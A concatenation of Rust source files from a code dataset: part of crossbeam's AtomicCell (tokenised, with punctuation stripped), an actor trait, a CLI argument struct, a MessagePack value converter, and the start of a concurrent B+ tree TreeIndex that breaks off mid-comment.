< T > ( ) } } impl < T : Default > AtomicCell < T > { pub fn take ( & self ) - > T { self . swap ( Default : : default ( ) ) } } impl < T : Copy > AtomicCell < T > { pub fn load ( & self ) - > T { unsafe { atomic_load ( self . as_ptr ( ) ) } } } impl < T : Copy + Eq > AtomicCell < T > { # [ deprecated ( note = " Use compare_exchange instead " ) ] pub fn compare_and_swap ( & self current : T new : T ) - > T { match self . compare_exchange ( current new ) { Ok ( v ) = > v Err ( v ) = > v } } pub fn compare_exchange ( & self current : T new : T ) - > Result < T T > { unsafe { atomic_compare_exchange_weak ( self . as_ptr ( ) current new ) } } # [ inline ] pub fn fetch_update < F > ( & self mut f : F ) - > Result < T T > where F : FnMut ( T ) - > Option < T > { let mut prev = self . load ( ) ; while let Some ( next ) = f ( prev ) { match self . compare_exchange ( prev next ) { x Ok ( _ ) = > return x Err ( next_prev ) = > prev = next_prev } } Err ( prev ) } } impl < T > Drop for AtomicCell < T > { fn drop ( & mut self ) { if mem : : needs_drop : : < T > ( ) { unsafe { self . as_ptr ( ) . drop_in_place ( ) ; } } } } macro_rules ! impl_arithmetic { ( t : ty fallback example : tt ) = > { impl AtomicCell < t > { / / / Increments the current value by val and returns the previous value . / / / / / / The addition wraps on overflow . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_add ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 10 ) ; / / / # [ inline ] pub fn fetch_add ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = value . wrapping_add ( val ) ; old } / / / Decrements the current value by val and returns the previous value . / / / / / / The subtraction wraps on overflow . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_sub ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 4 ) ; / / / # [ inline ] pub fn fetch_sub ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = value . wrapping_sub ( val ) ; old } / / / Applies bitwise " and " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_and ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 3 ) ; / / / # [ inline ] pub fn fetch_and ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value & = val ; old } / / / Applies bitwise " nand " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_nand ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) ! ( 7 & 3 ) ) ; / / / # [ inline ] pub fn fetch_nand ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = ! ( old & val ) ; old } / / / Applies bitwise " or " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_or ( 16 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 23 ) ; / / / # [ inline ] pub fn fetch_or ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value | = val ; old } / / / Applies bitwise " xor " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_xor ( 2 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 5 ) ; / / / # [ inline ] pub fn fetch_xor ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value ^ = val ; old } / / / Compares and sets the maximum of the current value and val # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_max ( 2 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 7 ) ; / / / # [ inline ] pub fn fetch_max ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = cmp : : max ( old val ) ; old } / / / Compares and sets the minimum of the current value and val # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_min ( 2 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 2 ) ; / / / # [ inline ] pub fn fetch_min ( & self val : t ) - > t { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = cmp : : min ( old val ) ; old } } } ; ( t : ty atomic : ty example : tt ) = > { impl AtomicCell < t > { / / / Increments the current value by val and returns the previous value . / / / / / / The addition wraps on overflow . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_add ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 10 ) ; / / / # [ inline ] pub fn fetch_add ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { let a = unsafe { & * ( self . as_ptr ( ) as * const atomic ) } ; a . fetch_add ( val Ordering : : AcqRel ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = value . wrapping_add ( val ) ; old } } / / / Decrements the current value by val and returns the previous value . / / / / / / The subtraction wraps on overflow . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_sub ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 4 ) ; / / / # [ inline ] pub fn fetch_sub ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { let a = unsafe { & * ( self . as_ptr ( ) as * const atomic ) } ; a . fetch_sub ( val Ordering : : AcqRel ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = value . wrapping_sub ( val ) ; old } } / / / Applies bitwise " and " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_and ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 3 ) ; / / / # [ inline ] pub fn fetch_and ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { let a = unsafe { & * ( self . as_ptr ( ) as * const atomic ) } ; a . fetch_and ( val Ordering : : AcqRel ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value & = val ; old } } / / / Applies bitwise " nand " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_nand ( 3 ) 7 ) ; / / / assert_eq ! ( a . load ( ) ! ( 7 & 3 ) ) ; / / / # [ inline ] pub fn fetch_nand ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { let a = unsafe { & * ( self . as_ptr ( ) as * const atomic ) } ; a . fetch_nand ( val Ordering : : AcqRel ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = ! ( old & val ) ; old } } / / / Applies bitwise " or " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_or ( 16 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 23 ) ; / / / # [ inline ] pub fn fetch_or ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { let a = unsafe { & * ( self . as_ptr ( ) as * const atomic ) } ; a . fetch_or ( val Ordering : : AcqRel ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value | = val ; old } } / / / Applies bitwise " xor " to the current value and returns the previous value . / / / / / / # Examples / / / / / / # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_xor ( 2 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 5 ) ; / / / # [ inline ] pub fn fetch_xor ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { let a = unsafe { & * ( self . as_ptr ( ) as * const atomic ) } ; a . fetch_xor ( val Ordering : : AcqRel ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value ^ = val ; old } } / / / Compares and sets the maximum of the current value and val # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_max ( 9 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 9 ) ; / / / # [ inline ] pub fn fetch_max ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { / / TODO : Atomic * : : fetch_max requires Rust 1 . 45 . self . fetch_update ( | old | Some ( cmp : : max ( old val ) ) ) . unwrap ( ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = cmp : : max ( old val ) ; old } } / / / Compares and sets the minimum of the current value and val # [ doc = example ] / / / / / / assert_eq ! ( a . fetch_min ( 2 ) 7 ) ; / / / assert_eq ! ( a . load ( ) 2 ) ; / / / # [ inline ] pub fn fetch_min ( & self val : t ) - > t { if can_transmute : : < t atomic > ( ) { / / TODO : Atomic * : : fetch_min requires Rust 1 . 45 . self . fetch_update ( | old | Some ( cmp : : min ( old val ) ) ) . unwrap ( ) } else { let _guard = lock ( self . as_ptr ( ) as usize ) . write ( ) ; let value = unsafe { & mut * ( self . as_ptr ( ) ) } ; let old = * value ; * value = cmp : : min ( old val ) ; old } } } } ; } impl_arithmetic ! ( u8 atomic : : AtomicU8 " let a = AtomicCell : : new ( 7u8 ) ; " ) ; impl_arithmetic ! ( i8 atomic : : AtomicI8 " let a = AtomicCell : : new ( 7i8 ) ; " ) ; impl_arithmetic ! ( u16 atomic : : AtomicU16 " let a = AtomicCell : : new ( 7u16 ) ; " ) ; impl_arithmetic ! ( i16 atomic : : AtomicI16 " let a = AtomicCell : : new ( 7i16 ) ; " ) ; impl_arithmetic ! ( u32 atomic : : AtomicU32 " let a = AtomicCell : : new ( 7u32 ) ; " ) ; impl_arithmetic ! ( i32 atomic : : AtomicI32 " let a = AtomicCell : : new ( 7i32 ) ; " ) ; # [ cfg ( not ( crossbeam_no_atomic_64 ) ) ] impl_arithmetic ! ( u64 atomic : : AtomicU64 " let a = AtomicCell : : new ( 7u64 ) ; " ) ; # [ cfg ( not ( crossbeam_no_atomic_64 ) ) ] impl_arithmetic ! ( i64 atomic : : AtomicI64 " let a = AtomicCell : : new ( 7i64 ) ; " ) ; # [ cfg ( crossbeam_no_atomic_64 ) ] impl_arithmetic ! ( u64 fallback " let a = AtomicCell : : new ( 7u64 ) ; " ) ; # [ cfg ( crossbeam_no_atomic_64 ) ] impl_arithmetic ! ( i64 fallback " let a = AtomicCell : : new ( 7i64 ) ; " ) ; impl_arithmetic ! ( u128 fallback " let a = AtomicCell : : new ( 7u128 ) ; " ) ; impl_arithmetic ! ( i128 fallback " let a = AtomicCell : : new ( 7i128 ) ; " ) ; impl_arithmetic ! ( usize atomic : : AtomicUsize " let a = AtomicCell : : new ( 7usize ) ; " ) ; impl_arithmetic ! ( isize atomic : : AtomicIsize " let a = AtomicCell : : new ( 7isize ) ; " ) ; impl AtomicCell < bool > { # [ inline ] pub fn fetch_and ( & self val : bool ) - > bool { let a = unsafe { & * ( self . as_ptr ( ) as * const AtomicBool ) } ; a . fetch_and ( val Ordering : : AcqRel ) } # [ inline ] pub fn fetch_nand ( & self val : bool ) - > bool { let a = unsafe { & * ( self . as_ptr ( ) as * const AtomicBool ) } ; a . fetch_nand ( val Ordering : : AcqRel ) } # [ inline ] pub fn fetch_or ( & self val : bool ) - > bool { let a = unsafe { & * ( self . as_ptr ( ) as * const AtomicBool ) } ; a . fetch_or ( val Ordering : : AcqRel ) } # [ inline ] pub fn fetch_xor ( & self val : bool ) - > bool { let a = unsafe { & * ( self . as_ptr ( ) as * const AtomicBool ) } ; a . fetch_xor ( val Ordering : : AcqRel ) } } impl < T : Default > Default for AtomicCell < T > { fn default ( ) - > AtomicCell < T > { AtomicCell : : new ( T : : default ( ) ) } } impl < T > From < T > for AtomicCell < T > { # [ inline ] fn from ( val : T ) - > AtomicCell < T > { AtomicCell : : new ( val ) } } impl < T : Copy + fmt : : Debug > fmt : : Debug for AtomicCell < T > { fn fmt ( & self f : & mut fmt : : Formatter < ' _ > ) - > fmt : : Result { f . debug_struct ( " AtomicCell " ) . field ( " value " & self . load ( ) ) . finish ( ) } } const fn can_transmute < A B > ( ) - > bool { ( mem : : size_of : : < A > ( ) = = mem : : size_of : : < B > ( ) ) & ( mem : : align_of : : < A > ( ) > = mem : : align_of : : < B > ( ) ) } # [ inline ] # [ must_use ] fn lock ( addr : usize ) - > & ' static SeqLock { const LEN : usize = 97 ; # [ allow ( clippy : : declare_interior_mutable_const ) ] const L : SeqLock = SeqLock : : new ( ) ; static LOCKS : [ SeqLock ; LEN ] = [ L ; LEN ] ; & LOCKS [ addr % LEN ] } struct AtomicUnit ; impl AtomicUnit { # [ inline ] fn load ( & self _order : Ordering ) { } # [ inline ] fn store ( & self _val : ( ) _order : Ordering ) { } # [ inline ] fn swap ( & self _val : ( ) _order : Ordering ) { } # [ inline ] fn compare_exchange_weak ( & self _current : ( ) _new : ( ) _success : Ordering _failure : Ordering ) - > Result < ( ) ( ) > { Ok ( ( ) ) } } macro_rules ! atomic { ( check t : ty atomic : ty a : ident atomic_op : expr ) = > { if can_transmute : : < t atomic > ( ) { let a : & atomic ; break atomic_op ; } } ; ( t : ty a : ident atomic_op : expr fallback_op : expr ) = > { loop { atomic ! ( check t AtomicUnit a atomic_op ) ; atomic ! ( check t atomic : : AtomicU8 a atomic_op ) ; atomic ! ( check t atomic : : AtomicU16 a atomic_op ) ; atomic ! ( check t atomic : : AtomicU32 a atomic_op ) ; # [ cfg ( not ( crossbeam_no_atomic_64 ) ) ] atomic ! ( check t atomic : : AtomicU64 a atomic_op ) ; / / TODO : AtomicU128 is unstable / / atomic ! ( check t atomic : : AtomicU128 a atomic_op ) ; break fallback_op ; } } ; } const fn atomic_is_lock_free < T > ( ) - > bool { let is_lock_free = can_transmute : : < T AtomicUnit > ( ) | can_transmute : : < T atomic : : AtomicU8 > ( ) | can_transmute : : < T atomic : : AtomicU16 > ( ) | can_transmute : : < T atomic : : AtomicU32 > ( ) ; # [ cfg ( not ( crossbeam_no_atomic_64 ) ) ] let is_lock_free = is_lock_free | can_transmute : : < T atomic : : AtomicU64 > ( ) ; is_lock_free } unsafe fn atomic_load < T > ( src : * mut T ) - > T where T : Copy { atomic ! { T a { a = & * ( src as * const _ as * const _ ) ; mem : : transmute_copy ( & a . load ( Ordering : : Acquire ) ) } { let lock = lock ( src as usize ) ; / / Try doing an optimistic read first . if let Some ( stamp ) = lock . optimistic_read ( ) { / / We need a volatile read here because other threads might concurrently modify the / / value . In theory data races are * always * UB even if we use volatile reads and / / discard the data when a data race is detected . The proper solution would be to / / do atomic reads and atomic writes but we can ' t atomically read and write all / / kinds of data since AtomicU8 is not available on stable Rust yet . / / Load as MaybeUninit because we may load a value that is not valid as T . let val = ptr : : read_volatile ( src . cast : : < MaybeUninit < T > > ( ) ) ; if lock . validate_read ( stamp ) { return val . assume_init ( ) ; } } / / Grab a regular write lock so that writers don ' t starve this load . let guard = lock . write ( ) ; let val = ptr : : read ( src ) ; / / The value hasn ' t been changed . Drop the guard without incrementing the stamp . guard . abort ( ) ; val } } } unsafe fn atomic_store < T > ( dst : * mut T val : T ) { atomic ! { T a { a = & * ( dst as * const _ as * const _ ) ; a . store ( mem : : transmute_copy ( & val ) Ordering : : Release ) ; mem : : forget ( val ) ; } { let _guard = lock ( dst as usize ) . write ( ) ; ptr : : write ( dst val ) ; } } } unsafe fn atomic_swap < T > ( dst : * mut T val : T ) - > T { atomic ! { T a { a = & * ( dst as * const _ as * const _ ) ; let res = mem : : transmute_copy ( & a . swap ( mem : : transmute_copy ( & val ) Ordering : : AcqRel ) ) ; mem : : forget ( val ) ; res } { let _guard = lock ( dst as usize ) . write ( ) ; ptr : : replace ( dst val ) } } } # [ allow ( clippy : : let_unit_value ) ] unsafe fn atomic_compare_exchange_weak < T > ( dst : * mut T mut current : T new : T ) - > Result < T T > where T : Copy + Eq { atomic ! { T a { a = & * ( dst as * const _ as * const _ ) ; let mut current_raw = mem : : transmute_copy ( & current ) ; let new_raw = mem : : transmute_copy ( & new ) ; loop { match a . compare_exchange_weak ( current_raw new_raw Ordering : : AcqRel Ordering : : Acquire ) { Ok ( _ ) = > break Ok ( current ) Err ( previous_raw ) = > { let previous = mem : : transmute_copy ( & previous_raw ) ; if ! T : : eq ( & previous & current ) { break Err ( previous ) ; } / / The compare - exchange operation has failed and didn ' t store new . The / / failure is either spurious or previous was semantically equal to / / current but not byte - equal . Let ' s retry with previous as the new / / current . current = previous ; current_raw = previous_raw ; } } } } { let guard = lock ( dst as usize ) . write ( ) ; if T : : eq ( & * dst & current ) { Ok ( ptr : : replace ( dst new ) ) } else { let val = ptr : : read ( dst ) ; / / The value hasn ' t been changed . Drop the guard without incrementing the stamp . guard . abort ( ) ; Err ( val ) } } } }
true
bf17204e361cf2852381aca655e8fcfc7724f353
Rust
delandtj/kay
/src/actor.rs
UTF-8
625
2.609375
3
[ "MIT" ]
permissive
use compact::Compact; use crate::id::{RawID, TypedID}; use crate::storage_aware::StorageAware; pub trait ActorOrActorTrait: 'static { type ID: TypedID; } impl<A: Actor> ActorOrActorTrait for A { type ID = <Self as Actor>::ID; } pub trait Actor: Compact + StorageAware + 'static { type ID: TypedID; fn id(&self) -> Self::ID; unsafe fn set_id(&mut self, id: RawID); fn id_as<TargetID: TraitIDFrom<Self>>(&self) -> TargetID { TargetID::from(self.id()) } } pub trait TraitIDFrom<A: Actor>: TypedID { fn from(id: <A as Actor>::ID) -> Self { Self::from_raw(id.as_raw()) } }
true
c0164e78709438f82109a92ce7728126cead297b
Rust
kennytm/borsholder
/src/args.rs
UTF-8
2,103
3.140625
3
[ "MIT" ]
permissive
//! Argument parsing use reqwest::Url; use serde::Serializer; use std::net::SocketAddr; use std::path::PathBuf; /// Stores the command line argument. #[derive(Debug, StructOpt, Serialize)] pub struct Args { /// The token to access the GitHub APIs. #[structopt(short = "t", long = "token", help = "GitHub token")] pub token: String, /// Owner of the GitHub repository. #[structopt(long = "owner", help = "Repository owner", default_value = "rust-lang")] pub owner: String, /// Name of the GitHub repository. #[structopt(long = "repository", help = "Repository name", default_value = "rust")] pub repository: String, /// URL to access the Homu queue. #[structopt( long = "homu-queue-url", help = "URL to the Homu queue", default_value = "https://buildbot2.rust-lang.org/homu/queue/rust" )] #[serde(serialize_with = "serialize_url")] pub homu_url: Url, /// Client ID of the Homu GitHub OAuth App. #[structopt( long = "homu-client-id", help = "Client ID of the Homu GitHub OAuth App", default_value = "f828d548f928f1e11199" )] pub homu_client_id: String, /// Socket address of the local web server. #[structopt( short = "l", long = "listen", help = "Address of local server", default_value = "127.0.0.1:55727" )] pub address: SocketAddr, /// Directory to find Tera templates and static resources #[structopt( short = "i", long = "templates", help = "Directory of the templates", default_value = "res", parse(from_os_str) )] #[serde(skip_serializing)] pub templates: PathBuf, /// HTTP(S) proxy server. If not `None`, all API requests will pass through this URL. #[structopt(short = "p", long = "proxy", help = "HTTP(S) proxy server")] #[serde(skip_serializing)] pub proxy: Option<Url>, } /// Serializes a URL using serde. fn serialize_url<S: Serializer>(url: &Url, serializer: S) -> Result<S::Ok, S::Error> { serializer.serialize_str(url.as_str()) }
true
52878630ad486c4e22dca0785dfc6f9afc61a73d
Rust
dflemstr/rq
/src/value/messagepack.rs
UTF-8
3,886
2.6875
3
[ "Apache-2.0" ]
permissive
use std::io; use ordered_float; use rmpv; use crate::error; use crate::value; #[derive(Debug)] pub struct MessagePackSource<R>(R) where R: io::Read; #[derive(Debug)] pub struct MessagePackSink<W>(W) where W: io::Write; #[inline] pub fn source<R>(r: R) -> MessagePackSource<R> where R: io::Read, { MessagePackSource(r) } #[inline] pub fn sink<W>(w: W) -> MessagePackSink<W> where W: io::Write, { MessagePackSink(w) } impl<R> value::Source for MessagePackSource<R> where R: io::Read, { #[inline] fn read(&mut self) -> error::Result<Option<value::Value>> { use rmpv::decode::Error; match rmpv::decode::value::read_value(&mut self.0) { Ok(v) => Ok(Some(value_from_message_pack(v)?)), Err(Error::InvalidMarkerRead(ref e)) if e.kind() == io::ErrorKind::UnexpectedEof => { Ok(None) } Err(e) => Err(error::Error::MessagePackDecode(e)), } } } impl<W> value::Sink for MessagePackSink<W> where W: io::Write, { #[inline] fn write(&mut self, v: value::Value) -> error::Result<()> { rmpv::encode::write_value(&mut self.0, &value_to_message_pack(v)).map_err(From::from) } } fn value_from_message_pack(value: rmpv::Value) -> error::Result<value::Value> { use rmpv::Value; match value { Value::Nil => Ok(value::Value::Unit), Value::Boolean(v) => Ok(value::Value::Bool(v)), Value::Integer(i) if i.is_u64() => Ok(value::Value::U64(i.as_u64().unwrap())), Value::Integer(i) if i.is_i64() => Ok(value::Value::I64(i.as_i64().unwrap())), Value::Integer(_) => unreachable!(), Value::F32(v) => Ok(value::Value::from_f32(v)), Value::F64(v) => Ok(value::Value::from_f64(v)), Value::String(v) => { if v.is_err() { Err(error::Error::Format { msg: v.as_err().unwrap().to_string(), }) } else { Ok(value::Value::String(v.into_str().unwrap())) } } Value::Ext(_, v) | Value::Binary(v) => Ok(value::Value::Bytes(v)), Value::Array(v) => Ok(value::Value::Sequence( v.into_iter() .map(value_from_message_pack) .collect::<error::Result<_>>()?, )), Value::Map(v) => Ok(value::Value::Map( v.into_iter() .map(|(k, v)| Ok((value_from_message_pack(k)?, value_from_message_pack(v)?))) .collect::<error::Result<_>>()?, )), } } fn value_to_message_pack(value: value::Value) -> rmpv::Value { use rmpv::Value; match value { value::Value::Unit => Value::Nil, value::Value::Bool(v) => Value::Boolean(v), value::Value::I8(v) => Value::Integer(v.into()), value::Value::I16(v) => Value::Integer(v.into()), value::Value::I32(v) => Value::Integer(v.into()), value::Value::I64(v) => Value::Integer(v.into()), value::Value::U8(v) => Value::Integer(v.into()), value::Value::U16(v) => Value::Integer(v.into()), value::Value::U32(v) => Value::Integer(v.into()), value::Value::U64(v) => Value::Integer(v.into()), value::Value::F32(ordered_float::OrderedFloat(v)) => Value::F32(v), value::Value::F64(ordered_float::OrderedFloat(v)) => Value::F64(v), value::Value::Char(v) => Value::String(format!("{}", v).into()), value::Value::String(v) => Value::String(v.into()), value::Value::Bytes(v) => Value::Binary(v), value::Value::Sequence(v) => { Value::Array(v.into_iter().map(value_to_message_pack).collect()) } value::Value::Map(v) => Value::Map( v.into_iter() .map(|(k, v)| (value_to_message_pack(k), value_to_message_pack(v))) .collect(), ), } }
true
eaae369f9c009aaabd7abcdb7e99ca1796a1266c
Rust
declanvk/scalable-concurrent-containers
/src/tree_index.rs
UTF-8
21,782
3.0625
3
[ "Apache-2.0" ]
permissive
//! The module implements [`TreeIndex`]. mod error; mod leaf; mod leaf_node; mod node; use crate::ebr::{Arc, AtomicArc, Barrier, Tag}; use error::{InsertError, RemoveError, SearchError}; use leaf::{Leaf, Scanner}; use node::Node; use std::borrow::Borrow; use std::cmp::Ordering; use std::fmt; use std::iter::FusedIterator; use std::ops::Bound::{Excluded, Included, Unbounded}; use std::ops::RangeBounds; use std::sync::atomic::Ordering::{AcqRel, Acquire, Relaxed}; /// A scalable concurrent B+ tree. /// /// [`TreeIndex`] is a B+ tree variant that is optimized for read operations. Read operations, /// such as read, scan, are neither blocked nor interrupted by other threads. Write operations, /// such as insert, remove, do not block if they do not entail structural changes to the tree. /// /// ## The key features of [`TreeIndex`] /// /// * Write-free read: read operations never modify the shared data. /// * Near lock-free write: write operations do not block unless a structural change is needed. /// /// ## The key statistics for [`TreeIndex`] /// /// * The maximum number of key-value pairs that a leaf can store: 8. /// * The maximum number of leaves or child nodes that a node can point to: 9. /// * The size of metadata per key-value pair in a leaf: 3-byte. /// * The size of metadata per leaf or node in a node: `size_of(K)` + 4. pub struct TreeIndex<K, V> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { root: AtomicArc<Node<K, V>>, } impl<K, V> TreeIndex<K, V> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { /// Creates an empty [`TreeIndex`]. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.read(&1, |_, v| *v).is_none()); /// ``` #[must_use] pub fn new() -> TreeIndex<K, V> { TreeIndex { root: AtomicArc::null(), } } /// Inserts a key-value pair. /// /// # Errors /// /// Returns an error along with the supplied key-value pair if the key exists. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.insert(1, 10).is_ok()); /// assert_eq!(treeindex.insert(1, 11).err().unwrap(), (1, 11)); /// assert_eq!(treeindex.read(&1, |k, v| *v).unwrap(), 10); /// ``` #[inline] pub fn insert(&self, mut key: K, mut value: V) -> Result<(), (K, V)> { let barrier = Barrier::new(); let mut root_ptr = self.root.load(Acquire, &barrier); loop { if let Some(root_ref) = root_ptr.as_ref() { match root_ref.insert(key, value, &barrier) { Ok(_) => return Ok(()), Err(error) => match error { InsertError::Duplicated(entry) => return Err(entry), InsertError::Full(entry) => { root_ref.split_root(&self.root, &barrier); key = entry.0; value = entry.1; } InsertError::Retry(entry) => { std::thread::yield_now(); key = entry.0; value = entry.1; } }, } root_ptr = self.root.load(Acquire, &barrier); continue; } let new_root = Arc::new(Node::new_leaf_node()); match self .root .compare_exchange(root_ptr, (Some(new_root), Tag::None), AcqRel, Acquire) { Ok((_, ptr)) | Err((_, ptr)) => root_ptr = ptr, } } } /// Removes a key-value pair. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(!treeindex.remove(&1)); /// assert!(treeindex.insert(1, 10).is_ok()); /// assert!(treeindex.remove(&1)); /// ``` #[inline] pub fn remove<Q>(&self, key_ref: &Q) -> bool where K: Borrow<Q>, Q: Ord + ?Sized, { self.remove_if(key_ref, |_| true) } /// Removes a key-value pair if the given condition is met. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.insert(1, 10).is_ok()); /// assert!(!treeindex.remove_if(&1, |v| *v == 0)); /// assert!(treeindex.remove_if(&1, |v| *v == 10)); /// ``` #[inline] pub fn remove_if<Q, F: FnMut(&V) -> bool>(&self, key_ref: &Q, mut condition: F) -> bool where K: Borrow<Q>, Q: Ord + ?Sized, { let mut has_been_removed = false; let barrier = Barrier::new(); let mut root_ptr = self.root.load(Acquire, &barrier); while let Some(root_ref) = root_ptr.as_ref() { match root_ref.remove_if(key_ref, &mut condition, &barrier) { Ok(removed) => return removed || has_been_removed, Err(remove_error) => match remove_error { RemoveError::Empty(removed) => { if removed && !has_been_removed { has_been_removed = true; } if Node::remove_root(&self.root, &barrier) { return has_been_removed; } } RemoveError::Retry(removed) => { std::thread::yield_now(); if removed && !has_been_removed { has_been_removed = true; } } }, }; root_ptr = self.root.load(Acquire, &barrier); } has_been_removed } /// Reads a key-value pair. /// /// It returns `None` if the key does not exist. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.read(&1, |k, v| *v).is_none()); /// assert!(treeindex.insert(1, 10).is_ok()); /// assert_eq!(treeindex.read(&1, |k, v| *v).unwrap(), 10); /// ``` #[inline] pub fn read<Q, R, F: FnOnce(&Q, &V) -> R>(&self, key_ref: &Q, reader: F) -> Option<R> where K: Borrow<Q>, Q: Ord + ?Sized, { let barrier = Barrier::new(); self.read_with(key_ref, reader, &barrier) } /// Reads a key-value pair using the supplied [`Barrier`]. /// /// It enables the caller to use the value reference outside the method. It returns `None` /// if the key does not exist. /// /// # Examples /// /// ``` /// use scc::ebr::Barrier; /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.insert(1, 10).is_ok()); /// /// let barrier = Barrier::new(); /// let value_ref = treeindex.read_with(&1, |k, v| v, &barrier).unwrap(); /// assert_eq!(*value_ref, 10); /// ``` #[inline] pub fn read_with<'b, Q, R, F: FnOnce(&Q, &'b V) -> R>( &self, key_ref: &Q, reader: F, barrier: &'b Barrier, ) -> Option<R> where K: Borrow<Q>, Q: Ord + ?Sized, { let mut root_ptr = self.root.load(Acquire, barrier); while let Some(root_ref) = root_ptr.as_ref() { match root_ref.search(key_ref, barrier) { Ok(result) => { if let Some(value) = result { return Some(reader(key_ref, value)); } return None; } Err(err) => match err { SearchError::Empty => return None, SearchError::Retry => { std::thread::yield_now(); root_ptr = self.root.load(Acquire, barrier); continue; } }, } } None } /// Clears the [`TreeIndex`]. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// for key in 0..16_u64 { /// assert!(treeindex.insert(key, 10).is_ok()); /// } /// /// treeindex.clear(); /// /// assert_eq!(treeindex.len(), 0); /// ``` #[inline] pub fn clear(&self) { self.root.swap((None, Tag::None), Relaxed); } /// Returns the size of the 